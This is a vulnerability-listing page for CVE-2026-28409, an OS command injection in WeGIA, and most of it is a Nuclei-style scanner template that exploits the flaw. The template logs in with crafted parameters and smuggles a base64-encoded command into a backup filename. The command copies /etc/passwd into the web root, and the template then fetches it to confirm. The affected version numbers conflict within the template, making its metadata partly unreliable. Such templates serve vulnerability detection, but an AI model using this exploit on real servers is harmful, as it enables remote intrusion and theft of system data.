| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2026-28409 | 27 Feb 2026 21:50 | – | attackerkb |
| CVE-2026-28409 | 28 Feb 2026 00:56 | – | circl |
| WeGIA OS Command Injection Vulnerability | 27 Feb 2026 00:00 | – | cnnvd |
| CVE-2026-28409 | 27 Feb 2026 21:50 | – | cve |
| CVE-2026-28409 WeGIA Vulnerable to Remote Code Execution (RCE) via OS Command Injection | 27 Feb 2026 21:50 | – | cvelist |
| EUVD-2026-9080 | 27 Feb 2026 21:50 | – | euvd |
| CVE-2026-28409 | 27 Feb 2026 22:16 | – | nvd |
| CVE-2026-28409 WeGIA Vulnerable to Remote Code Execution (RCE) via OS Command Injection | 27 Feb 2026 21:50 | – | osv |
| PT-2026-22412 | 27 Feb 2026 00:00 | – | ptsecurity |
| CVE-2026-28409 | 1 Mar 2026 01:43 | – | redhatcve |

```yaml
id: CVE-2026-28409

info:
  name: WeGIA <= 3.6.4 - Remote Code Execution
  author: 0x_Akoko
  severity: critical
  description: |
    WeGIA <= 3.6.5 contains a remote code execution caused by improper validation of backup file names in the database restoration functionality, letting attackers with administrative access execute arbitrary OS commands
  impact: |
    Attackers with admin access can execute arbitrary OS commands, potentially leading to full server compromise.
  remediation: |
    Upgrade to version 3.6.5 or later.
  reference:
    - https://cxsecurity.com/issue/WLB-2026030009
    - https://github.com/LabRedesCefetRJ/WeGIA
    - https://nvd.nist.gov/vuln/detail/CVE-2026-28409
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2026-28409
    epss-score: 0.03315
    epss-percentile: 0.87089
    cwe-id: CWE-78
  metadata:
    verified: true
    max-request: 4
    vendor: labredescefetRJ
    product: wegia
    shodan-query: http.html:"WeGIA"
    fofa-query: body="WeGIA"
  tags: cve,cve2026,wegia,rce

variables:
  filename: "{{to_lower(rand_text_alpha(8))}}"

flow: http(1) && http(2) && http(3) && http(4)

http:
  - raw:
      - |
        POST /WeGIA/html/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        c=true&cpf=admin&id_pessoa=1

    extractors:
      - type: regex
        name: session
        part: header
        group: 1
        regex:
          - 'PHPSESSID=([a-zA-Z0-9]+)'
        internal: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
        internal: true

  - raw:
      - |
        POST /WeGIA/html/configuracao/importar_dump.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID={{session}}
        Content-Type: multipart/form-data; boundary=----test0boundary

        ------test0boundary
        Content-Disposition: form-data; name="usuario"

        1
        ------test0boundary
        Content-Disposition: form-data; name="id_pessoa"

        1
        ------test0boundary
        Content-Disposition: form-data; name="import"; filename="dump;export F={{filename}};eval $(echo Y2F0IC9ldGMvcGFzc3dkID4gL3Zhci93d3cvaHRtbC9XZUdJQS8kRi50eHQ= | base64 -d);poc.dump.tar.gz"
        Content-Type: application/gzip

        {{hex_decode("1f8b08000000000000030300000000000000000000")}}
        ------test0boundary--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
        internal: true

  - raw:
      - |
        GET /WeGIA/html/configuracao/gerenciar_backup.php?action=restore&file=dump%3Bexport+F%3D{{filename}}%3Beval+%24%28echo+Y2F0IC9ldGMvcGFzc3dkID4gL3Zhci93d3cvaHRtbC9XZUdJQS8kRi50eHQ%3D+%7C+base64+-d%29%3Bpoc.dump.tar.gz&usuario=1&id_pessoa=1 HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID={{session}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
        internal: true

  - raw:
      - |
        GET /WeGIA/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044022019e9e1a3ffdd16a4863d77560ef5de45a2f0ebc5a9003e780be11f8920af328402207efaa1a3bd8297ae900088642e6180caaea1517f56a70387b488f5e65a3348a1:922c64590222798bb761d5b6d8e72950
```